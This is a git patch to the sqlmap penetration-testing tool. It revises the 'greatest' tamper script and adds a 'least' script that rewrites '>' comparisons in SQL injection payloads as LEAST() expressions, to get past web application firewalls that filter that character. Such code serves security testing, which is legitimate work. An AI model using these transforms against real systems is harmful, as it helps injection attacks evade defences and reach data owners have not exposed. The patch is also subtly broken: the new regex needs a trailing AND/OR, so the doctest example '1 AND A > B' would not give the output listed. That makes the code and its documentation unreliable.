From 7fb598a9ab0789ed987428cdf45a42f4f389dfe1 Mon Sep 17 00:00:00 2001
From: root <root@localhost.localdomain>
Date: Thu, 7 Sep 2017 23:01:50 +0700
Subject: [PATCH] Fix regex @greatest.py, add @least.py

---
 tamper/greatest.py |  4 ++--
 tamper/least.py    | 43 +++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 45 insertions(+), 2 deletions(-)
 create mode 100644 tamper/least.py

diff --git a/tamper/greatest.py b/tamper/greatest.py
index 012cc6771..f04951f8c 100644
--- a/tamper/greatest.py
+++ b/tamper/greatest.py
@@ -36,10 +36,10 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
-        match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>#-]+)", payload)
+        match = re.search(r"(?i)((?:\bAND|OR\b)\s*)((?:(?!\bAND|OR\b).)+?)\s*>\s*((?:(?!\bAND|OR\b).)+?)(\s*(?:\bAND|OR\b))", payload)
 
         if match:
-            _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(4), match.group(5), match.group(4))
+            _ = "%sGREATEST(%s,%s+1)=%s%s" % (match.group(1), match.group(2), match.group(3), match.group(2), match.group(4))
             retVal = retVal.replace(match.group(0), _)
 
     return retVal
diff --git a/tamper/least.py b/tamper/least.py
new file mode 100644
index 000000000..188cd9793
--- /dev/null
+++ b/tamper/least.py
@@ -0,0 +1,43 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGHEST
+
+def dependencies():
+    pass
+
+def tamper(payload, **kwargs):
+    """
+    Replaces greater than operator ('>') with 'LEAST' counterpart
+
+    Tested against:
+        * MySQL 5.5
+
+    Notes:
+        * Useful to bypass weak and bespoke web application firewalls that
+          filter the greater than character
+        * The LEAST clause is a widespread SQL command. Hence, this
+          tamper script should work against majority of databases
+
+    >>> tamper('1 AND A > B')
+    '1 AND LEAST(A,B+1)=B+1'
+    """
+
+    retVal = payload
+
+    if payload:
+        match = re.search(r"(?i)((?:\bAND|OR\b)\s*)((?:(?!\bAND|OR\b).)+?)\s*>\s*((?:(?!\bAND|OR\b).)+?)(\s*(?:\bAND|OR\b))", payload)
+
+        if match:
+            _ = "%sLEAST(%s,%s+1)=%s+1%s" % (match.group(1), match.group(2), match.group(3), match.group(3), match.group(4))
+            retVal = retVal.replace(match.group(0), _)
+
+    return retVal
\ No newline at end of file